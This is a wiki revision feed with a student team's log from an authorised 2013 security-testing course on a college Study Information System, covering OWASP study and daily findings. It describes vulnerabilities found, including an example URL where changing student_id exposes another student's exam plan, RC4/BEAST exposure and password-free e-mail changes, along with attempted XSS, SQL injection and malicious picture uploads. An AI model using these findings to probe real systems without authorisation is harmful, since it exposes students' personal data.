* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials section and [[#Final documentation]] section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62380</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62380"/>
		<updated>2013-04-05T07:00:08Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Markus Rintamäki */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
